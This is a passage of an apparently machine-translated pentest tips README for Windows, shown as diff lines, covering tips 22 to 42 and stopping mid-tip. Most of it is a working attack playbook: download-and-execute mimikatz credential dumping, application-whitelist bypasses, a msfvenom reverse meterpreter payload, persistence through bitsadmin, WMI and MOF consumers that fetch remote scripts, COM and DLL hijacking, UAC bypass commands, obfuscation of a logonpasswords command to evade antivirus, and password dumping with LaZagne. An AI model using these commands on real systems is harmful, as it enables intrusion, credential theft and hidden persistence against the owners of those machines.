+["Infiltration Techniques - Parameter Hiding Techniques for Shortcut Files"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80 %E5%B7%A7-%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%E6%96%87%E4%BB%B6%E7%9A%84% E5%8F%82%E6%95%B0%E9%9A%90%E8%97%8F%E6%8A%80%E5%B7%A7/)
+---
+
+### Tips 22. 32-bit programs can remotely inject 64-bit processes
+
+POC:
+
+https://github.com/3gstudent/CreateRemoteThread/blob/master/CreateRemoteThread32to64.cpp
+
+reference:
+
+["32-bit program for remote injection of 64-bit processes"] (https://3gstudent.github.io/3gstudent.github.io/32%E4%BD%8D%E7%A8%8B%E5%BA% 8F%E5%AF%B964%E4%BD%8D%E8%BF%9B%E7%A8%8B%E7%9A%84%E8%BF%9C%E7%A8%8B%E6%B3%A8% E5%85%A5%E5%AE%9E%E7%8E%B0/)
+
+---
+
+### Tips 23. The process of system permissions needs to be downgraded in some cases.
+
+Processes that use sytem permissions may encounter the following issues:
+
+1. Unable to get the current user's file content
+
+For example, the user's screen cannot be captured
+
+2. Environmental variables are different
+
+Therefore need to reduce the rights to the current user
+
+Demotion method 1: Use SelectMyParent.exe
+
+Code download address: https://github.com/3gstudent/From-System-authority-to-Medium-authority/blob/master/Processauthority.cpp
+
+reference:
+
+["Infiltration Skills - Procedure for Demotion Reduction"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5 %B7%A7-%E7%A8%8B%E5%BA%8F%E7%9A%84%E9%99%8D%E6%9D%83%E5%90%AF%E5%8A%A8/)
+
+Demotion method 2: use msdtc
+
+Using msdtc will load oci.dll with system privileges, but execute it in the admin privilege cmd:
+
+Msdtc -install
+
+Start calc.exe for high permission
+
+reference:
+
+[Use msdtc to maintain persistence] (https://3gstudent.github.io/3gstudent.github.io/Use-msdtc-to-maintain-persistence/)
+
+---
+
+### Tips 24. You can install WinPcap on Windows by command line, so you can use nmap and Masscan on Windows Springboard.
+
+reference:
+
+["Infiltration Techniques - Running Masscan and Nmap on Windows Platforms"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80% E5%B7%A7-Windows%E5%B9%B3%E5%8F%B0%E8%BF%90%E8%A1%8CMasscan%E5%92%8CNmap/)
+
+---
+
+### Tips 25. How to execute mimikatz on Windows platform
+
+#### Method 1: Via powershell
+
+```
+Powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
+```
+
+#### Method 2: Via InstallUtil.exe
+
+```
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe
+```
+
+reference:
+
+"Using Whitelists to Bypass 360 Instances"
+
+"More tests that use whitelists to bypass restrictions"
+
+#### Method 3: Via regsvr32.exe
+
+https://gist.githubusercontent.com/subTee/c3d5030bb99aa3f96bfa507c1c184504/raw/24dc0f93f1ebdda7c401dd3890259fa70d23f75b/regsvr32-katz.cs
+
+Encapsulate mimikatz into dll and run mimkatz via regsvr32 passed in parameters
+
+```
+Rundll32 katz.dll, EntryPoint log coffee exit
+```
+
+reference:
+
+Code Execution of Regsvr32.exe
+
+#### Method 4: Via msbuild.exe
+
+Download the xml file and save it as a.xml:
+
+Https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20mimikatz.xml
+
+Cmd:
+
+```
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe executes a.xml
+```
+
+reference:
+
+["Use MSBuild To Do More"] (https://3gstudent.github.io/3gstudent.github.io/Use-MSBuild-To-Do-More/)
+
+#### Method 5: Passing csi.exe
+
+```
+"C:\Program Files (x86)\MSBuild\14.0\Bin\csi.exe" c:\test\katz.csx
+```
+
+reference:
+
+[Study Notes Weekly No. 4 (Use tracker to load dll & Use csi to bypass UMCI & Execute C# from XSLT file)] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes- Weekly-No.4 (Use-tracker-to-load-dll-&-Use-csi-to-bypass-UMCI-&-Execute-C-from-XSLT-file)/)
+
+#### Method 6: Passing the js/vbs script
+
+Https://gist.github.com/subTee/5c636b8736530fb20c3d
+
+https://gist.github.com/subTee/b30e0bcc7645c790fcd993cfd0ad622f
+
+reference:
+
+["Using JS to load .Net programs"] (https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8JS%E5%8A%A0%E8%BD% BD.Net%E7%A8%8B%E5%BA%8F/)
+
+---
+
+### Tips 26. The location in the Windows system where you can store and read the payload.
+
+#### Method 1: WMI
+
+storage:
+
+```
+$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null, $null)
+$StaticClass.Name = 'Win32_Command'
+$StaticClass.Put()
+$StaticClass.Properties.Add('Command' , $Payload)
+$StaticClass.Put()
+```
+
+Read:
+
+```
+$Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value
+```
+
+reference:
+
+"WMI Backdoor"
+
+#### Method 2: PE file containing digital signature
+
+Using the algorithm flaw of the file hash, hide the Payload from the PE file without affecting the digital signature of the PE file.
+
+reference:
+
+["Steganography - Hide Payload in Digital Certificates in PE Files"] (https://github.com/3gstudent/Pentest-and-Development-Tips/edit/master/README.md)
+
+#### Method 3: Special ADS
+
+(1)...
+
+```
+Type putty.exe > ...:putty.exe
+Wmic process call create c:\test\ads\...:putty.exe
+```
+
+(2) Special COM files
+
+```
+Type putty.exe > \\.\C:\test\ads\COM1:putty.exe
+Wmic process call create \\.\C:\test\ads\COM1:putty.exe
+```
+
+(3) Disk root directory
+
+```
+Type putty.exe >C:\:putty.exe
+Wmic process call create C:\:putty.exe
+```
+
+reference:
+
+["Advanced Advice for Hidden Alternative Data Streams"] (https://3gstudent.github.io/3gstudent.github.io/Hidden-Alternative-Data-Streams%E7%9A%84%E8%BF%9B% E9%98%B6%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7/)
+
+---
+
+### Tips 27. Information worth collecting in Windows system
+
+#### (1) Registered WMI information
+
+```
+Wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter GET __RELPATH /FORMAT:list
+Wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list
+Wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding GET __RELPATH /FORMAT:list
+```
+
+The administrator may use WMI to record the attacker's call to WMI, which can be viewed by wmic. Of course, the monitoring function can be disabled by wmic.
+
+reference:
+
+[Study Notes Weekly No. 1 (Monitor WMI & Exports To C++ & Use DiskCleanup bypass UAC)]] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes-Weekly-No.1 (Monitor -WMI_ExportsToC++_Use-DiskCleanup-bypass-UAC)/)
+
+---
+
+### Tips 28. Common methods for Windows system bounce meterpreter
+
+#### Method 1: Loading dll rebound meterpreter via rundll32
+
+Msf:
+
+```
+Msfvenom -p windows/meterpreter/reverse_http -f dll LHOST=192.168.174.133 LPORT=8080>./a.dll
+```
+
+Generate a.dll and upload it to the test host
+
+Execute `rundll32.exe a.dll, Control_RunDLL`, and go online.
+
+#### Method 2: Rebounding the meterpreter via cpl
+
+See https://raw.githubusercontent.com/3gstudent/test/master/meterpreter_reverse_tcp.cpp for the code.
+
+Generate dll, rename it to cpl, double click to execute
+
+#### Method 3: Rebounding the meterpreter via powershell
+
+https://raw.githubusercontent.com/3gstudent/Code-Execution-and-Process-Injection/master/2-CodeExecution-Meterpreter.ps1
+
+---
+
+### Tips 29. How to load dll in Windows system
+
+#### Method 1: rundll32
+
+```
+Rundll32 a.dll,EntryPoint
+```
+
+#### Method 2: regsvr32
+
+```
+Regsvr32 a.dll
+```
+
+reference:
+
+Code Execution of Regsvr32.exe
+
+#### Method 3: odbcconf
+
+```
+Odbcconf.exe /a {regsvr c:\test\odbcconf.dll}
+```
+
+reference:
+
+[Study Notes Weekly No.3 (Use odbcconf to load dll & Get-Exports & ETW USB Keylogger)] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes-Weekly-No. 3 (Use-odbcconf-to-load-dll-&-Get-Exports-&-ETW-USB-Keylogger)/)
+
+#### Method 4: Tracker
+
+```
+Tracker.exe /d test.dll /c svchost.exe
+```
+
+Tracker.exe contains Microsoft digital signatures that bypass the limitations of the application whitelist
+
+reference:
+
+[Study Notes Weekly No. 4 (Use tracker to load dll & Use csi to bypass UMCI & Execute C# from XSLT file)] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes- Weekly-No.4 (Use-tracker-to-load-dll-&-Use-csi-to-bypass-UMCI-&-Execute-C-from-XSLT-file)/)
+
+#### Method 5: Excel.Application object's RegisterXLL() method
+
+Prerequisite: Microsoft Office software is installed
+
+1.rundll32
+
+```
+rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\test\\messagebox.dll');this.close();
+```
+
+2.js
+
+```
+var excel = new ActiveXObject("Excel.Application");
+excel.RegisterXLL("C:\\test\\messagebox.dll");
+```
+
+3.powershell
+
+```
+$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
+$excel.RegisterXLL("C:\test\messagebox.dll")
+```
+
+reference:
+
+["Use Excel.Application object's RegisterXLL() method to load dll"](https://3gstudent.github.io/3gstudent.github.io/Use-Excel.Application-object's-RegisterXLL()-method-to-load -dll/)
+
+#### Method 6: xwizard.exe
+
+Copy xwizard.exe from %windir%\system32\ to the new directory C:\x
+
+Rename msg.dll to xwizards.dll and save it at C:\x
+
+Command line execution:
+
+```
+Xwizard processXMLFile 1.txt
+```
+
+Successfully loaded C:\x\xwizards.dll
+
+reference:
+
+["Use xwizard.exe to load dll"] (https://3gstudent.github.io/3gstudent.github.io/Use-xwizard.exe-to-load-dll/)
+
+---
+
+### Tips 30. Windows Persistence
+
+#### Method 1: bitsadmin
+
+```
+Bitsadmin /create backdoor
+Bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe
+Bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"
+Bitsadmin /Resume backdoor
+```
+
+reference:
+
+"Use bitsadmin to maintain persistence and bypass Autoruns"
+
+#### Method 2: mof
+
+```
+Pragma namespace("\\\\.\\root\\subscription")
+Instance of __EventFilter as $EventFilter
+{
+    EventNamespace = "Root\\Cimv2";
+    Name = "filtP1";
+    Query = "Select * From __InstanceModificationEvent "
+            "Where TargetInstance Isa \"Win32_LocalTime\" "
+            "And TargetInstance.Second = 1";
+    QueryLanguage = "WQL";
+};
+Instance of ActiveScriptEventConsumer as $Consumer
+{
+    Name = "consP1";
+    ScriptingEngine = "JScript";
+    ScriptText = "GetObject(\"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test\")";
+};
+Instance of __FilterToConsumerBinding
+{
+    Consumer = $Consumer;
+    Filter = $EventFilter;
+};
+```
+
+Administrator privileges:
+
+```
+Mofcomp test.mof
+```
+
+reference:
+
+"WSC, JSRAT and WMI Backdoor"
+ 
+#### Method 3: wmi
+
+Execute notepad.exe every 60 seconds
+
+```
+Wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
+Wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\notepad.exe",CommandLineTemplate="C:\Windows\System32\notepad.exe"
+Wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""
+```
+
+reference:
+
+[Study Notes of WMI Persistence using wmic.exe] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe/)
+
+#### Method 4: Userland Persistence With Scheduled Tasks
+
+Hijack the scheduled task UserTask, load testmsg.dll at system startup
+
+The operation is as follows:
+
+Create a new item under HKEY_CURRENT_USER\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}
+
+Then create a new item InprocServer32
+
+The value is set to `c:\test\testmsg.dll`
+
+Testmsg.dll contains the following export functions:
+
+DllCanUnloadNow
+DllGetClassObject
+DllRegisterServer
+DllUnregisterServer
+
+Waiting for users to log in again
+
+reference:
+
+["Userland registry hijacking"] (https://3gstudent.github.io/3gstudent.github.io/Userland-registry-hijacking/)
+
+#### Method 5: Netsh
+
+The helper DLL needs to include the export function InitHelperDll
+
+Administrator privileges：
+
+```
+netsh add helper c:\test\netshtest.dll
+```
+
+After the helper dll is successfully added, c:\test\netshtest.dll will be loaded each time netsh is called.
+
+reference:
+
+[Netsh persistence] (https://3gstudent.github.io/3gstudent.github.io/Netsh-persistence/)
+
+#### Method 6: Shim
+
+Common ways:
+
+- InjectDll
+- RedirectShortcut
+- RedirectEXE
+
+["Application Compatibility Shims in Penetration Testing"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF %95%E4%B8%AD%E7%9A%84Application-Compatibility-Shims/)
+
+#### Method 7: dll hijacking
+
+Automatically enumerate processes through Rattler to detect the existence of available dll hijacking processes
+
+Path:
+
+- c:\windows\midimap.dll
+
+reference:
+
+["Ratler Test for DLL Hijacking Vulnerability Automated Identification Tool"] (https://3gstudent.github.io/3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6 %B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96%E8%AF%86%E5%88%AB%E5%B7%A5%E5%85%B7Rattler%E6%B5 %8B%E8%AF%95/)
+
+#### Method 8: DoubleAgent
+
+Write a custom Verifier provider DLL
+
+Install via Application Verifier
+
+Inject into the target process to execute the payload
+
+Whenever the target process starts, it will execute payload, which is equivalent to a self-starting method.
+
+reference:
+
+["Application Verifier in Penetration Testing") (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B %E8%AF%95%E4%B8%AD%E7%9A%84Application-Verifier(DoubleAgent%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D)/)
+
+#### Method 9: waitfor.exe
+
+Self-starting is not supported, but can be activated remotely, and the background process is displayed as waitfor.exe
+
+reference:
+
+["Use Waitfor.exe to maintain persistence"] (https://3gstudent.github.io/3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence/)
+
+#### Method 10: AppDomainManager
+
+For .Net programs, the .Do program can be hijacked by modifying the AppDomainManager. If you hijack the startup process of a system common .Net program such as powershell.exe and add a payload to it, you can implement a passive backdoor trigger mechanism.
+
+reference:
+
+["Use AppDomainManager to maintain persistence"] (https://3gstudent.github.io/3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence/)
+
+#### Method 11: Office Add-ins
+
+If the office software is already installed, you can implement hijacking by configuring the Office add-in as a passive backdoor.
+
+Commonly used methods:
+
+Word WLL
+
+Excel XLL
+
+Excel VBA add-ins
+
+PowerPoint VBA add-ins
+
+POC: https://github.com/3gstudent/Office-Persistence
+
+reference:
+
+["Use Office to maintain persistence"] (https://3gstudent.github.io/3gstudent.github.io/Use-Office-to-maintain-persistence/)
+
+["Office Persistence on x64 operating system"] (https://3gstudent.github.io/3gstudent.github.io/Office-Persistence-on-x64-operating-system/)
+
+#### Method 12: CLR
+
+Backdoor without administrator privileges and the ability to hijack all .Net programs
+
+POC: https://github.com/3gstudent/CLR-Injection
+
+reference:
+
+["Use CLR to maintain persistence"] (https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-maintain-persistence/)
+
+#### Method 13: msdtc
+
+Use the MSDTC service to load dlls, implement self-starting, and bypass Autoruns to detect startup items.
+
+reference:
+
+[Use msdtc to maintain persistence] (https://3gstudent.github.io/3gstudent.github.io/Use-msdtc-to-maintain-persistence/)
+
+#### Method 14: Hijack CAccPropServicesClass and MMDeviceEnumerator
+
+No need to reboot the system, no administrator privileges required
+
+Implemented by modifying the registry
+
+POC: https://github.com/3gstudent/COM-Object-hijacking
+
+reference:
+
+["Use COM Object hijacking to maintain persistence - Hijack CAccPropServicesClass and MMDeviceEnumerator"] (https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack- CAccPropServicesClass-and-MMDeviceEnumerator/)
+
+#### Method 15: Hijack explorer.exe
+
+No need to reboot the system, no administrator privileges required
+
+Implemented by modifying the registry
+
+reference:
+
+["Use COM Object hijacking to maintain persistence - Hijack explorer.exe"] (https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack- Explorer.exe/)
+
+#### Method 16: Windows FAX DLL Injection
+
+By DLL hijacking, hijacking Explorer.exe to load fxsst.dll
+
+Explorer.exe will load `c:\Windows\System32\fxsst.dll` at startup (service is enabled by default for fax service)
+
+Save the payload.dll in c:\Windows\fxsst.dll, which can implement dll hijacking, hijacking Explorer.exe to load fxsst.dll
+
+#### Method 17: Hijack specific features of Office software
+
+By dll hijacking, triggers backdoors when Office software performs certain functions
+
+reference:
+
+["Using BDF to implant backdoors into DLL files"] (https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91DLL%E6% 96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/)
+
+#### Method 18: Special Registry Keys
+
+The registry key creates a special name for the registry key, which the user normally cannot read (using the Win32 API), but the system can execute (using the Native API)
+
+reference：
+
+["Infiltration Technique - "Hidden" Creation of Registry"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80% E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E5%88%9B% E5%BB%BA/)
+
+["Infiltration Techniques - "Hide" More Tests in the Registry] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A %80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E6%9B %B4%E5%A4%9A%E6%B5%8B%E8%AF%95/)
+
+#### Method 19: Powershell Configuration File
+
+Modify the powershell configuration file, the backdoor is triggered after the powershell process starts.
+
+Check to see if you are using a configuration file:
+
+```
+Test-Path $profile
+```
+
+Create a configuration file:
+
+```
+New-Item -Path $profile -Type File –Force
+```
+
+Modify the contents of the configuration file and add a backdoor:
+
+```
+$string = 'Start-Process "cmd.exe"'
+$string | Out-File -FilePath "C:\Users\a\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append
+```
+
+From:
+
+Https://rastamouse.me/2018/03/a-view-of-persistence/
+
+#### Method 20: xml file
+
+reference:
+
+[https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8wmic%E8%B0%83%E7%94%A8xsl%E6%96%87%E4 %BB%B6%E7%9A%84%E5%88%86%E6%9E%90%E4%B8%8E%E5%88%A9%E7%94%A8/"](https://3gstudent. Github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8wmic%E8%B0%83%E7%94%A8xsl%E6%96%87%E4%BB%B6%E7%9A %84%E5%88%86%E6%9E%90%E4%B8%8E%E5%88%A9%E7%94%A8/)
+
+---
+
+### Tips 31. UAC bypass
+
+#### Method 1: use eventvwr.exe and registry hijacking
+
+Applicable: Win7, Win8.1, Win 10
+
+https://github.com/3gstudent/UAC-Bypass/blob/master/Invoke-EventVwrBypass.ps1
+
+reference:
+
+[Study Notes of WMI Persistence using wmic.exe] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe/)
+
+["Userland registry hijacking"] (https://3gstudent.github.io/3gstudent.github.io/Userland-registry-hijacking/)
+
+#### Method 2: use sdclt.exe
+
+For Win10
+
+reference:
+
+[Study Notes of using sdclt.exe to bypass UAC] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-using-sdclt.exe-to-bypass-UAC/)
+
+#### Method 3: use SilentCleanup
+
+For Win8, Win10
+
+```
+Reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
+Schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+```
+
+reference:
+
+[Study Notes of using SilentCleanup to bypass UAC] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-using-SilentCleanup-to-bypass-UAC/)
+
+#### Method 4: use wscript.exe
+
+Only for Win7
+
+https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1
+
+reference:
+
+["Invoke-WScriptBypassUAC Utilization Analysis in Empire"] (https://3gstudent.github.io/3gstudent.github.io/Empire%E4%B8%AD%E7%9A%84Invoke-WScriptBypassUAC%E5%88%A9 %E7%94%A8%E5%88%86%E6%9E%90/)
+
+#### Method 5: use cmstp.exe
+
+Https://msitpros.com/?p=3960
+
+Suitable for Win7
+
+#### Method 5: Modify environment variables, hijack high-privilege .Net programs
+
+For Win7-Win10
+
+Like gpedit.msc
+
+Modify the environment variables, use the CLR to hijack the boot process of gpedit.msc
+
+reference:
+
+["Use CLR to bypass UAC"] (https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-bypass-UAC/)
+
+#### Method 6: Modify the registry HKCU\Software\Classes\CLSID, hijack high-privilege program
+
+For Win7-Win10
+
+- {B29D466A-857D-35BA-8712-A758861BFEA1}
+- {D5AB5662-131D-453D-88C8-9BBA87502ADE}
+- {0A29FF9E-7F9C-4437-8B11-F424491E3931}
+- {CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}
+
+reference:
+
+["Use CLR to bypass UAC"] (https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-bypass-UAC/)
+
+#### Method 7: Using COM Components
+
+Modify process information, spoof PSAPI, call COM component to implement unauthorized operation
+
+reference:
+
+["Transfering Files by COM Component IFileOperation"] (https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87COM%E7%BB%84%E4%BB %B6IFileOperation%E8%B6%8A%E6%9D%83%E5%A4%8D%E5%88%B6%E6%96%87%E4%BB%B6/)
+
+["NetFwPolicy2 over the right to close the firewall through the COM component"] (https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87COM%E7%BB%84%E4%BB %B6NetFwPolicy2%E8%B6%8A%E6%9D%83%E5%85%B3%E9%97%AD%E9%98%B2%E7%81%AB%E5%A2%99/)
+
+["Using the COM component IARPUninstallStringLauncher to bypass UAC"] (https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87COM%E7%BB%84%E4%BB %B6IARPUninstallStringLauncher%E7%BB%95%E8%BF%87UAC/)
+
+---
+
+### Tips 32. Visual Studio generated exe or dll is used in other systems, prompting the lack of relevant DLL files
+
+Liberation method:
+
+Package the program for release
+
+Project Menu -> Project Properties, C / C + + -> Code Generation -> Run Library, select multi-threading (/MT)
+
+---
+
+### Tips 33. Use LaZagne to export passwords stored in common applications in the current system.
+
+You can use LaZagne to export passwords stored in common applications in the current system (eg browser, Wifi, Git, Outlook, etc.)
+
+https://github.com/AlessandroZ/LaZagne
+
+Of course, you can also modify the LaZagne source code to implement password export for other applications.
+
+reference:
+
+["Customized Script Development in LaZagne, a Local Password Viewing Tool"] (https://3gstudent.github.io/3gstudent.github.io/%E6%9C%AC%E5%9C%B0%E5%AF%86 %E7%A0%81%E6%9F%A5%E7%9C%8B%E5%B7%A5%E5%85%B7LaZagne%E4%B8%AD%E7%9A%84%E8%87%AA%E5 %AE%9A%E4%B9%89%E8%84%9A%E6%9C%AC%E5%BC%80%E5%8F%91/)
+
+---
+
+### Tips 34. Using powershell to read and write files
+
+Read the text file:
+
+```
+$file = Get-Content "1.txt"
+```
+
+Write a text file:
+
+```
+Set-content "1.txt"
+```
+
+Read binary：
+
+```
+[System.IO.File]::ReadAllBytes('1.exe')
+```
+
+Write a binary file:
+
+```
+[System.IO.File]::WriteAllBytes("1.exe",$fileContentBytes)
+```
+
+---
+
+### Tips 35. powershell for base64 encoding/decoding
+
+coding:
+
+```
+$encoded = [System.Convert]::ToBase64String($fileContent)
+```
+
+decoding:
+
+```
+$fileContent = [System.Convert]::FromBase64String($encoded)
+```
+reference:
+
+[Study Notes of using BGInfo to bypass Application Whitelisting] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-using-BGInfo-to-bypass-Application-Whitelisting/)
+
+---
+
+### Tips 36 If the powershell script is killed, try using Invoke-Obfuscation for confusion.
+
+https://github.com/danielbohannon/Invoke-Obfuscation
+
+Eg.
+
+Set the code to be confused:
+
+```
+Set scriptblock " Invoke-111111 -Command "log privilege::debug sekurlsa::logonpasswords exit" "
+```
+
+Enter `encoding`
+
+Enter `1` and specify the encoding as ascii
+
+Get confused code:
+
+```
+" $(SEt-iTem 'VARIaBle:OFS' '' ) "+ [StRinG](( 73,110 , 118 ,111, 107, 101, 45, 49, 49 ,49 ,49 ,49 , 49, 32 , 45 , 67 , 111, 109 , 109, 97 , 110 , 100 , 32 , 34 , 108 , 111 , 103 , 32 , 112 , 114 , 105 , 118 , 105 , 108 , 101 , 103 , 101 , 58 , 58 , 100 , 101 , 98 , 117 , 103 , 32 , 115,101,107,117,114,108,115, 97,58, 58, 108,111,103,111,110,112,97,115,115,119,111,114,100,115,32,101,120,105,116,34 )|FOReacH-objeCT{( [ ChAR][iNT] $_) } ) +"$( Set-variAbLE 'oFS' ' ' ) "|. ( $env:PUbLic[13]+$eNv:PuBlIc[5]+'x')
+```
+
+---
+
+### Tips 37 python script to exe
+
+Two common methods:
+
+- Use py2exe
+- Use PyInstaller
+
+How to use and common bug fixes can refer to the reference link
+
+reference:
+
+["Customized Script Development in LaZagne, a Local Password Viewing Tool"] (https://3gstudent.github.io/3gstudent.github.io/%E6%9C%AC%E5%9C%B0%E5%AF%86 %E7%A0%81%E6%9F%A5%E7%9C%8B%E5%B7%A5%E5%85%B7LaZagne%E4%B8%AD%E7%9A%84%E8%87%AA%E5 %AE%9A%E4%B9%89%E8%84%9A%E6%9C%AC%E5%BC%80%E5%8F%91/)
+
+---
+
+### Tips 38 Normal user rights write files to the path of administrator rights
+
+Eg.
+
+Release files to the `c:\windows` folder with normal user rights
+
+```
+Makecab c:\test\test.exe %TMP%\1.tmp
+Wusa %TMP%\1.tmp /extract:"c:\windows" /quiet
+```
+
+Applicable to Win7, Win8, learning from:
+
+https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1
+
+reference:
+
+["Invoke-WScriptBypassUAC Utilization Analysis in Empire"] (https://3gstudent.github.io/3gstudent.github.io/Empire%E4%B8%AD%E7%9A%84Invoke-WScriptBypassUAC%E5%88%A9 %E7%94%A8%E5%88%86%E6%9E%90/)
+
+---
+
+### Tips 39 Summary of methods for executing programs on remote systems
+
+Common methods:
+
+- at
+- psexec
+- WMIC
+- wmiexec
+- smbexec
+- powershell remoting
+
+Psexec usage:
+
+```
+Psexec.exe \\test.local /accepteula -u test\admin -p test123! -s -c test.bat
+```
+
+Test.bat is local
+
+new method:
+
+- DCOM
+
+reference:
+
+["Domain Penetration - Using DCOM to Execute Programs in Remote Systems"] (https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F -%E5%88%A9%E7%94%A8DCOM%E5%9C%A8%E8%BF%9C%E7%A8%8B%E7%B3%BB%E7%BB%9F%E6%89%A7% E8%A1%8C%E7%A8%8B%E5%BA%8F/)
+
+---
+
+### Tips 40 Looking for services that can be utilized in Windows systems
+
+Enumerate the path of the executable file corresponding to the Windows system service. If the path contains the write permission of the normal user, the service can be used to increase the permission.
+
+Powershell code:
+
+```
+$ErrorActionPreference="SilentlyContinue"
+$out = (Get-WmiObject win32_service | select PathName)
+$out|% {[array]$global:path += $_.PathName}
+For($i=0;$i -le $out.Count-1;$i++)
+{
+    $a=Get-Acl -Path $out[$i].PathName.ToUpper().Substring($out[$i].PathName.ToUpper().IndexOfAny("C"),$out[$i]. PathName.ToUpper().LastIndexOfAny("\"))
+ If($a.Owner -ne "NT AUTHORITY\SYSTEM"){
+If($a.Owner -ne "NT SERVICE\TrustedInstaller"){
+If($a.Owner -ne "BUILTIN\Administrators"){
+Get-WmiObject win32_service | ?{$_.PathName -like $out[$i].PathName}|select Name,PathName,ProcessId,StartMode,State,Status
+Write-host Owner: $a.Owner
+}
+}
+    }
+}
+Write-host [+] All done.
+```
+
+reference:
+
+["Use powershell to find a writable windows service"] (https://3gstudent.github.io/3gstudent.github.io/Use-powershell-to-find-a-writable-windows-service/)
+
+---
+
+### Tips 41 Using anti-virus software configuration errors to achieve self-starting and prioritizing anti-virus software execution
+
+Windows system supports Logon Scripts. Logon Scripts are executed at system startup. The execution order takes precedence over anti-virus software. Of course, anti-virus software cannot intercept the scripts in Logon Scripts (anti-virus software has not been started).
+
+The key is whether the anti-virus software will intercept the configuration of Logon Scripts.
+
+Add Logon Scripts with special operations, antivirus software will not intercept
+
+**Note:**
+
+The anti-virus software mentioned above refers to "partial" anti-virus software, which is not universal.
+
+reference:
+
+["Use Logon Scripts to maintain persistence"] (https://3gstudent.github.io/3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence/)
+
+---
+
+### Tips 42 Compiling c# program notes
+
+Use Visual Studio:
+
